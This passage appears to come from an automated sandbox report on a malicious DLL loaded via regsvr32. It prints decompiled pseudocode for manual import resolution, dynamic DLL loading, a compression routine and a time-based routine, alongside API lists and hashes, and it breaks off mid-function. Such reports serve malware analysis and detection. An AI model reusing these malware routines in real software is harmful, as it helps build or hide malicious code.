                            • Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                            • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E1001249B(signed int __eax, intOrPtr _a4) {
                            				intOrPtr* _v8;
                            				signed int* _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				intOrPtr _v32;
                            				struct HINSTANCE__* _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				struct HINSTANCE__* _v48;
                            				intOrPtr _v52;
                            				signed int _v56;
                            				intOrPtr _v60;
                            				signed int _v64;
                            				signed int _t109;
                            				signed int _t112;
                            				signed int _t115;
                            				void* _t163;
                            
                            				_v44 = _v44 & 0x00000000;
                            				if(_a4 != 0) {
                            					_v48 = GetModuleHandleA("kernel32.dll");
                            					_v40 = E1000E099(_v48, "GetProcAddress");
                            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                            					_v32 = _v52;
                            					_t109 = 8;
                            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                            						L24:
                            						return 0;
                            					}
                            					_v56 = 0x80000000;
                            					_t112 = 8;
                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                            						_v8 = _v8 + 0x14;
                            					}
                            					_t115 = 8;
                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                            						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
                            						if(_v36 != 0) {
                            							if( *_v8 == 0) {
                            								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                            							} else {
                            								_v12 =  *_v8 + _a4;
                            							}
                            							_v28 = _v28 & 0x00000000;
                            							while( *_v12 != 0) {
                            								_v24 = _v24 & 0x00000000;
                            								_v16 = _v16 & 0x00000000;
                            								_v64 = _v64 & 0x00000000;
                            								_v20 = _v20 & 0x00000000;
                            								if(( *_v12 & _v56) == 0) {
                            									_v60 =  *_v12 + _a4;
                            									_v20 = _v60 + 2;
                            									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                            									_v16 = _v40(_v36, _v20);
                            								} else {
                            									_v24 =  *_v12;
                            									_v20 = _v24 & 0x0000ffff;
                            									_v16 = _v40(_v36, _v20);
                            								}
                            								if(_v24 != _v16) {
                            									_v44 = _v44 + 1;
                            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                            										 *_v12 = _v16;
                            									} else {
                            										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                            									}
                            								}
                            								_v12 =  &(_v12[1]);
                            								_v28 = _v28 + 4;
                            							}
                            							_v8 = _v8 + 0x14;
                            							continue;
                            						}
                            						_t163 = 0xfffffffd;
                            						return _t163;
                            					}
                            					goto L24;
                            				}
                            				return __eax | 0xffffffff;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                            • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID: GetProcAddress$kernel32.dll
                            • API String ID: 4133054770-1584408056
                            • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                            • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                            • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                            • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				void _v140;
                            				signed char _t14;
                            				char _t15;
                            				intOrPtr _t20;
                            				void* _t25;
                            				intOrPtr _t26;
                            				intOrPtr _t32;
                            				WCHAR* _t34;
                            				intOrPtr _t35;
                            				struct HINSTANCE__* _t37;
                            				int _t38;
                            				intOrPtr _t46;
                            				void* _t47;
                            				intOrPtr _t50;
                            				void* _t60;
                            				void* _t61;
                            				char _t62;
                            				char* _t63;
                            				void* _t65;
                            				intOrPtr _t66;
                            				char _t68;
                            
                            				_t65 = __esi;
                            				_t61 = __edi;
                            				_t47 = __ebx;
                            				_t50 =  *0x1001e688; // 0x1930590
                            				_t14 =  *(_t50 + 0x1898);
                            				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                            					_t15 = E100095E1(_t50, 0xb62);
                            					_t66 =  *0x1001e688; // 0x1930590
                            					_t62 = _t15;
                            					_t67 = _t66 + 0xb0;
                            					_v8 = _t62;
                            					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
                            					_t20 =  *0x1001e688; // 0x1930590
                            					asm("sbb eax, eax");
                            					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                            					_t63 = "\\";
                            					_t26 =  *0x1001e688; // 0x1930590
                            					_t68 = E100092E5(_t26 + 0x1020);
                            					_v12 = _t68;
                            					E100085D5( &_v8);
                            					_t32 =  *0x1001e688; // 0x1930590
                            					_t34 = E100092E5(_t32 + 0x122a);
                            					 *0x1001e784 = _t34;
                            					_t35 =  *0x1001e684; // 0x19afaa0
                            					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                            					_t37 = LoadLibraryW( *0x1001e784);
                            					 *0x1001e77c = _t37;
                            					if(_t37 == 0) {
                            						_t38 = 0;
                            					} else {
                            						_push(_t37);
                            						_t60 = 0x28;
                            						_t38 = E1000E171(0x1001bb48, _t60);
                            					}
                            					 *0x1001e780 = _t38;
                            					E1000861A( &_v12, 0xfffffffe);
                            					memset( &_v140, 0, 0x80);
                            					if( *0x1001e780 != 0) {
                            						goto L10;
                            					} else {
                            						E1000861A(0x1001e784, 0xfffffffe);
                            						goto L8;
                            					}
                            				} else {
                            					L8:
                            					if( *0x1001e780 == 0) {
                            						_t46 =  *0x1001e6bc; // 0x19afbc8
                            						 *0x1001e780 = _t46;
                            					}
                            					L10:
                            					return 1;
                            				}
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoadmemset
                            • String ID: %08x$dll
                            • API String ID: 3406617148-2963171978
                            • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                            • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                            • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                            • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 99%
                            			E10012D70(int _a4, signed int _a8) {
                            				int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				void* __esi;
                            				void* _t137;
                            				signed int _t141;
                            				intOrPtr* _t142;
                            				signed int _t145;
                            				signed int _t146;
                            				intOrPtr _t151;
                            				intOrPtr _t161;
                            				intOrPtr _t162;
                            				intOrPtr _t167;
                            				intOrPtr _t170;
                            				signed int _t172;
                            				intOrPtr _t173;
                            				int _t184;
                            				intOrPtr _t185;
                            				intOrPtr _t188;
                            				signed int _t189;
                            				void* _t195;
                            				int _t202;
                            				int _t208;
                            				intOrPtr _t217;
                            				signed int _t218;
                            				int _t219;
                            				intOrPtr _t220;
                            				signed int _t221;
                            				signed int _t222;
                            				int _t224;
                            				int _t225;
                            				signed int _t227;
                            				intOrPtr _t228;
                            				int _t232;
                            				int _t234;
                            				signed int _t235;
                            				int _t239;
                            				void* _t240;
                            				int _t245;
                            				int _t252;
                            				signed int _t253;
                            				int _t254;
                            				void* _t257;
                            				void* _t258;
                            				int _t259;
                            				intOrPtr _t260;
                            				int _t261;
                            				signed int _t269;
                            				signed int _t271;
                            				intOrPtr* _t272;
                            				void* _t273;
                            
                            				_t253 = _a8;
                            				_t272 = _a4;
                            				_t3 = _t272 + 0xc; // 0x452bf84d
                            				_t4 = _t272 + 0x2c; // 0x8df075ff
                            				_t228 =  *_t4;
                            				_t137 =  *_t3 + 0xfffffffb;
                            				_t229 =  <=  ? _t137 : _t228;
                            				_v16 =  <=  ? _t137 : _t228;
                            				_t269 = 0;
                            				_a4 =  *((intOrPtr*)( *_t272 + 4));
                            				asm("o16 nop [eax+eax]");
                            				while(1) {
                            					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                            					_t141 =  *_t8 + 0x2a >> 3;
                            					_v12 = 0xffff;
                            					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                            					if(_t217 < _t141) {
                            						break;
                            					}
                            					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                            					_t12 = _t272 + 0x5c; // 0x84e85000
                            					_t245 =  *_t11 -  *_t12;
                            					_v8 = _t245;
                            					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                            					_t247 =  <  ? _t195 : _v12;
                            					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                            					if(_t227 >= _v16) {
                            						L7:
                            						if(_t253 != 4) {
                            							L10:
                            							_t269 = 0;
                            							__eflags = 0;
                            						} else {
                            							_t285 = _t227 - _t195;
                            							if(_t227 != _t195) {
                            								goto L10;
                            							} else {
                            								_t269 = _t253 - 3;
                            							}
                            						}
                            						E10015D90(_t272, _t272, 0, 0, _t269);
                            						_t18 = _t272 + 0x14; // 0xc703f045
                            						_t19 = _t272 + 8; // 0x8d000040
                            						 *( *_t18 +  *_t19 - 4) = _t227;
                            						_t22 = _t272 + 0x14; // 0xc703f045
                            						_t23 = _t272 + 8; // 0x8d000040
                            						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                            						_t26 = _t272 + 0x14; // 0xc703f045
                            						_t27 = _t272 + 8; // 0x8d000040
                            						 *( *_t26 +  *_t27 - 2) =  !_t227;
                            						_t30 = _t272 + 0x14; // 0xc703f045
                            						_t31 = _t272 + 8; // 0x8d000040
                            						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                            						E10014AF0(_t285,  *_t272);
                            						_t202 = _v8;
                            						_t273 = _t273 + 0x14;
                            						if(_t202 != 0) {
                            							_t208 =  >  ? _t227 : _t202;
                            							_v8 = _t208;
                            							_t36 = _t272 + 0x38; // 0xf47d8bff
                            							_t37 = _t272 + 0x5c; // 0x84e85000
                            							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                            							_t273 = _t273 + 0xc;
                            							_t252 = _v8;
                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                            							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                            							_t227 = _t227 - _t252;
                            						}
                            						if(_t227 != 0) {
                            							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
                            							_t273 = _t273 + 0xc;
                            							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                            							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                            							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                            						}
                            						_t253 = _a8;
                            						if(_t269 == 0) {
                            							continue;
                            						}
                            					} else {
                            						if(_t227 != 0 || _t253 == 4) {
                            							if(_t253 != 0 && _t227 == _t195) {
                            								goto L7;
                            							}
                            						}
                            					}
                            					break;
                            				}
                            				_t142 =  *_t272;
                            				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                            				_a4 = _t232;
                            				if(_t232 == 0) {
                            					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                            					_t254 =  *_t83;
                            				} else {
                            					_t59 = _t272 + 0x2c; // 0x8df075ff
                            					_t224 =  *_t59;
                            					if(_t232 < _t224) {
                            						_t65 = _t272 + 0x3c; // 0x830cc483
                            						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                            						_t260 =  *_t66;
                            						__eflags =  *_t65 - _t260 - _t232;
                            						if( *_t65 - _t260 <= _t232) {
                            							_t67 = _t272 + 0x38; // 0xf47d8bff
                            							_t261 = _t260 - _t224;
                            							 *(_t272 + 0x6c) = _t261;
                            							memcpy( *_t67,  *_t67 + _t224, _t261);
                            							_t70 = _t272 + 0x16b0; // 0xdf750008
                            							_t188 =  *_t70;
                            							_t273 = _t273 + 0xc;
                            							_t232 = _a4;
                            							__eflags = _t188 - 2;
                            							if(_t188 < 2) {
                            								_t189 = _t188 + 1;
                            								__eflags = _t189;
                            								 *(_t272 + 0x16b0) = _t189;
                            							}
                            						}
                            						_t73 = _t272 + 0x38; // 0xf47d8bff
                            						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                            						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                            						_t225 = _a4;
                            						_t273 = _t273 + 0xc;
                            						_t76 = _t272 + 0x6c;
                            						 *_t76 =  *(_t272 + 0x6c) + _t225;
                            						__eflags =  *_t76;
                            						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                            						_t184 =  *_t78;
                            						_t79 = _t272 + 0x2c; // 0x8df075ff
                            						_t239 =  *_t79;
                            					} else {
                            						 *(_t272 + 0x16b0) = 2;
                            						_t61 = _t272 + 0x38; // 0xf47d8bff
                            						memcpy( *_t61,  *_t142 - _t224, _t224);
                            						_t62 = _t272 + 0x2c; // 0x8df075ff
                            						_t184 =  *_t62;
                            						_t273 = _t273 + 0xc;
                            						_t225 = _a4;
                            						_t239 = _t184;
                            						 *(_t272 + 0x6c) = _t184;
                            					}
                            					_t254 = _t184;
                            					 *(_t272 + 0x5c) = _t184;
                            					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                            					_t185 =  *_t81;
                            					_t240 = _t239 - _t185;
                            					_t241 =  <=  ? _t225 : _t240;
                            					_t242 = ( <=  ? _t225 : _t240) + _t185;
                            					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                            				}
                            				if( *(_t272 + 0x16c0) < _t254) {
                            					 *(_t272 + 0x16c0) = _t254;
                            				}
                            				if(_t269 == 0) {
                            					_t218 = _a8;
                            					__eflags = _t218;
                            					if(_t218 == 0) {
                            						L34:
                            						_t89 = _t272 + 0x3c; // 0x830cc483
                            						_t219 =  *_t272;
                            						_t145 =  *_t89 - _t254 - 1;
                            						_a4 =  *_t272;
                            						_t234 = _t254;
                            						_v16 = _t145;
                            						_v8 = _t254;
                            						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                            						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                            							_v8 = _t254;
                            							_t95 = _t272 + 0x5c; // 0x84e85000
                            							_a4 = _t219;
                            							_t234 = _t254;
                            							_t97 = _t272 + 0x2c; // 0x8df075ff
                            							__eflags =  *_t95 -  *_t97;
                            							if( *_t95 >=  *_t97) {
                            								_t98 = _t272 + 0x2c; // 0x8df075ff
                            								_t167 =  *_t98;
                            								_t259 = _t254 - _t167;
                            								_t99 = _t272 + 0x38; // 0xf47d8bff
                            								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                            								 *(_t272 + 0x6c) = _t259;
                            								memcpy( *_t99, _t167 +  *_t99, _t259);
                            								_t103 = _t272 + 0x16b0; // 0xdf750008
                            								_t170 =  *_t103;
                            								_t273 = _t273 + 0xc;
                            								__eflags = _t170 - 2;
                            								if(_t170 < 2) {
                            									_t172 = _t170 + 1;
                            									__eflags = _t172;
                            									 *(_t272 + 0x16b0) = _t172;
                            								}
                            								_t106 = _t272 + 0x2c; // 0x8df075ff
                            								_t145 = _v16 +  *_t106;
                            								__eflags = _t145;
                            								_a4 =  *_t272;
                            								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                            								_t234 =  *_t108;
                            								_v8 = _t234;
                            							}
                            						}
                            						_t255 = _a4;
                            						_t220 =  *((intOrPtr*)(_a4 + 4));
                            						__eflags = _t145 - _t220;
                            						_t221 =  <=  ? _t145 : _t220;
                            						_t146 = _t221;
                            						_a4 = _t221;
                            						_t222 = _a8;
                            						__eflags = _t146;
                            						if(_t146 != 0) {
                            							_t114 = _t272 + 0x38; // 0xf47d8bff
                            							E10014C30(_t255,  *_t114 + _v8, _t146);
                            							_t273 = _t273 + 0xc;
                            							_t117 = _t272 + 0x6c;
                            							 *_t117 =  *(_t272 + 0x6c) + _a4;
                            							__eflags =  *_t117;
                            							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                            							_t234 =  *_t119;
                            						}
                            						__eflags =  *(_t272 + 0x16c0) - _t234;
                            						if( *(_t272 + 0x16c0) < _t234) {
                            							 *(_t272 + 0x16c0) = _t234;
                            						}
                            						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                            						_t123 = _t272 + 0xc; // 0x452bf84d
                            						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                            						__eflags = _t257 - 0xffff;
                            						_t258 =  >  ? 0xffff : _t257;
                            						_t124 = _t272 + 0x2c; // 0x8df075ff
                            						_t151 =  *_t124;
                            						_t125 = _t272 + 0x5c; // 0x84e85000
                            						_t235 = _t234 -  *_t125;
                            						__eflags = _t258 - _t151;
                            						_t152 =  <=  ? _t258 : _t151;
                            						__eflags = _t235 - ( <=  ? _t258 : _t151);
                            						if(_t235 >= ( <=  ? _t258 : _t151)) {
                            							L49:
                            							__eflags = _t235 - _t258;
                            							_t154 =  >  ? _t258 : _t235;
                            							_a4 =  >  ? _t258 : _t235;
                            							__eflags = _t222 - 4;
                            							if(_t222 != 4) {
                            								L53:
                            								_t269 = 0;
                            								__eflags = 0;
                            							} else {
                            								_t161 =  *_t272;
                            								__eflags =  *(_t161 + 4);
                            								_t154 = _a4;
                            								if( *(_t161 + 4) != 0) {
                            									goto L53;
                            								} else {
                            									__eflags = _t154 - _t235;
                            									if(_t154 != _t235) {
                            										goto L53;
                            									} else {
                            										_t269 = _t222 - 3;
                            									}
                            								}
                            							}
                            							_t131 = _t272 + 0x38; // 0xf47d8bff
                            							_t132 = _t272 + 0x5c; // 0x84e85000
                            							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                            							_t134 = _t272 + 0x5c;
                            							 *_t134 =  *(_t272 + 0x5c) + _a4;
                            							__eflags =  *_t134;
                            							E10014AF0( *_t134,  *_t272);
                            						} else {
                            							__eflags = _t235;
                            							if(_t235 != 0) {
                            								L46:
                            								__eflags = _t222;
                            								if(_t222 != 0) {
                            									_t162 =  *_t272;
                            									__eflags =  *(_t162 + 4);
                            									if( *(_t162 + 4) == 0) {
                            										__eflags = _t235 - _t258;
                            										if(_t235 <= _t258) {
                            											goto L49;
                            										}
                            									}
                            								}
                            							} else {
                            								__eflags = _t222 - 4;
                            								if(_t222 == 4) {
                            									goto L46;
                            								}
                            							}
                            						}
                            						asm("sbb edi, edi");
                            						_t271 =  ~_t269 & 0x00000002;
                            						__eflags = _t271;
                            						return _t271;
                            					} else {
                            						__eflags = _t218 - 4;
                            						if(_t218 == 4) {
                            							goto L34;
                            						} else {
                            							_t173 =  *_t272;
                            							__eflags =  *(_t173 + 4);
                            							if( *(_t173 + 4) != 0) {
                            								goto L34;
                            							} else {
                            								_t88 = _t272 + 0x5c; // 0x84e85000
                            								__eflags = _t254 -  *_t88;
                            								if(_t254 !=  *_t88) {
                            									goto L34;
                            								} else {
                            									return 1;
                            								}
                            							}
                            						}
                            					}
                            				} else {
                            					return 3;
                            				}
                            			}























































                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                            • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                            				char _v516;
                            				char _v556;
                            				char _v564;
                            				char _v568;
                            				char _v572;
                            				char _v576;
                            				intOrPtr _v580;
                            				char _v588;
                            				signed int _v596;
                            				intOrPtr _v602;
                            				intOrPtr _v604;
                            				char _v608;
                            				CHAR* _v612;
                            				CHAR* _v616;
                            				signed int _v620;
                            				signed int _v624;
                            				signed int _v628;
                            				signed int _v632;
                            				char _v636;
                            				intOrPtr _t119;
                            				signed int _t122;
                            				CHAR* _t124;
                            				intOrPtr _t125;
                            				CHAR* _t127;
                            				WCHAR* _t130;
                            				intOrPtr _t133;
                            				intOrPtr _t137;
                            				WCHAR* _t138;
                            				intOrPtr _t142;
                            				WCHAR* _t143;
                            				CHAR* _t144;
                            				intOrPtr _t145;
                            				intOrPtr _t150;
                            				intOrPtr _t153;
                            				WCHAR* _t154;
                            				signed int _t159;
                            				WCHAR* _t160;
                            				intOrPtr _t163;
                            				intOrPtr _t165;
                            				intOrPtr _t166;
                            				intOrPtr _t170;
                            				signed int _t173;
                            				signed int _t178;
                            				intOrPtr _t182;
                            				WCHAR* _t184;
                            				char _t186;
                            				WCHAR* _t188;
                            				intOrPtr _t200;
                            				intOrPtr _t211;
                            				signed int _t215;
                            				char _t220;
                            				WCHAR* _t231;
                            				intOrPtr _t235;
                            				intOrPtr _t238;
                            				intOrPtr _t239;
                            				intOrPtr _t246;
                            				signed int _t248;
                            				WCHAR* _t249;
                            				CHAR* _t250;
                            				intOrPtr _t262;
                            				void* _t271;
                            				intOrPtr _t272;
                            				signed int _t277;
                            				void* _t278;
                            				intOrPtr _t280;
                            				signed int _t282;
                            				void* _t298;
                            				void* _t299;
                            				intOrPtr _t305;
                            				CHAR* _t326;
                            				void* _t328;
                            				WCHAR* _t329;
                            				intOrPtr _t331;
                            				WCHAR* _t333;
                            				signed int _t335;
                            				intOrPtr* _t337;
                            				void* _t338;
                            				void* _t339;
                            				void* _t353;
                            
                            				_t353 = __fp0;
                            				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                            				_t119 =  *0x1001e688; // 0x1930590
                            				_v620 = _v620 & 0x00000000;
                            				_t328 = __ecx;
                            				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                            					L7:
                            					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
                            					E1000A86D( &_v556, _t14, _t351);
                            					_t298 = 0x64;
                            					_t122 = E1000A471( &_v556, _t298);
                            					 *0x1001e748 = _t122;
                            					if(_t122 != 0) {
                            						_push(0x4e5);
                            						_t299 = 0x10;
                            						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
                            						 *_t337 = 0x610;
                            						_t124 = E100095E1(0x1001b9cc);
                            						_push(0);
                            						_push(_t124);
                            						_v612 = _t124;
                            						_t125 =  *0x1001e688; // 0x1930590
                            						_t127 = E100092E5(_t125 + 0x228);
                            						_t338 = _t337 + 0xc;
                            						_v616 = _t127;
                            						E100085D5( &_v612);
                            						_t130 = E1000B269(_t127);
                            						_t246 = 3;
                            						__eflags = _t130;
                            						if(_t130 != 0) {
                            							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                            							 *_t328 = _t246;
                            						}
                            						E1000861A( &_v616, 0xfffffffe);
                            						_t133 =  *0x1001e688; // 0x1930590
                            						_t22 = _t133 + 0x114; // 0x19306a4
                            						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                            						_t262 =  *0x1001e688; // 0x1930590
                            						_t339 = _t338 + 0x14;
                            						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                            						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                            							L17:
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							asm("stosd");
                            							_v572 = _t328;
                            							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                            							_t137 =  *0x1001e680; // 0x0
                            							_t138 =  *(_t137 + 8);
                            							__eflags = _t138;
                            							if(_t138 != 0) {
                            								 *_t138(0, 0, 1,  &_v568,  &_v564);
                            							}
                            							_v620 = _v620 & 0x00000000;
                            							E1000E2C6(_t353,  &_v576);
                            							_pop(_t262);
                            							_t142 =  *0x1001e6b4; // 0x19afc48
                            							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                            							__eflags = _t143;
                            							if(_t143 == 0) {
                            								E1000E2C6(_t353,  &_v588);
                            								_t235 =  *0x1001e6b4; // 0x19afc48
                            								_pop(_t262);
                            								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                            							}
                            							__eflags =  *0x1001e73c;
                            							if( *0x1001e73c <= 0) {
                            								goto L36;
                            							} else {
                            								_t165 =  *0x1001e680; // 0x0
                            								__eflags =  *(_t165 + 8);
                            								if( *(_t165 + 8) != 0) {
                            									_t231 =  *(_t165 + 0xc);
                            									__eflags = _t231;
                            									if(_t231 != 0) {
                            										 *_t231(_v580);
                            									}
                            								}
                            								_t166 =  *0x1001e688; // 0x1930590
                            								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                            								__eflags = _t262 - _t246;
                            								if(_t262 == _t246) {
                            									goto L36;
                            								} else {
                            									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                            									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                            										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                            										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                            											E100049A5();
                            											asm("stosd");
                            											asm("stosd");
                            											asm("stosd");
                            											asm("stosd");
                            											_t170 =  *0x1001e684; // 0x19afaa0
                            											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                            											_t262 = _v602;
                            											_t248 = 0x3c;
                            											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                            											_v596 = _t173;
                            											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                            											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                            											_v624 = _t178;
                            											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                            											_t182 =  *0x1001e688; // 0x1930590
                            											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                            											_t339 = _t339 + 0xc;
                            											__eflags = _t184;
                            											if(_t184 >= 0) {
                            												_t333 = E10008604(0x1000);
                            												_v616 = _t333;
                            												_pop(_t262);
                            												__eflags = _t333;
                            												if(_t333 != 0) {
                            													_t186 = E1000109A(_t262, 0x148);
                            													_t305 =  *0x1001e688; // 0x1930590
                            													_v636 = _t186;
                            													_push(_t305 + 0x648);
                            													_push(0xa);
                            													_push(7);
                            													_t271 = 2;
                            													E1000902D(_t271,  &_v572);
                            													_t272 =  *0x1001e688; // 0x1930590
                            													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                            													_t339 = _t339 + 0x18;
                            													_v632 = _t188;
                            													__eflags = _t188;
                            													if(_t188 != 0) {
                            														_push(_v624 % _t248 & 0x0000ffff);
                            														_push(_v628 & 0x0000ffff);
                            														_push(_v596 % _t248 & 0x0000ffff);
                            														_push(_v620 & 0x0000ffff);
                            														_push(_v632);
                            														_push( &_v572);
                            														_t200 =  *0x1001e688; // 0x1930590
                            														__eflags = _t200 + 0x1020;
                            														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
                            														E100085D5( &_v636);
                            														E1000A911(_t333, 0, 0xbb8, 1);
                            														E1000861A( &_v632, 0xfffffffe);
                            														_t339 = _t339 + 0x44;
                            													}
                            													E1000861A( &_v616, 0xfffffffe);
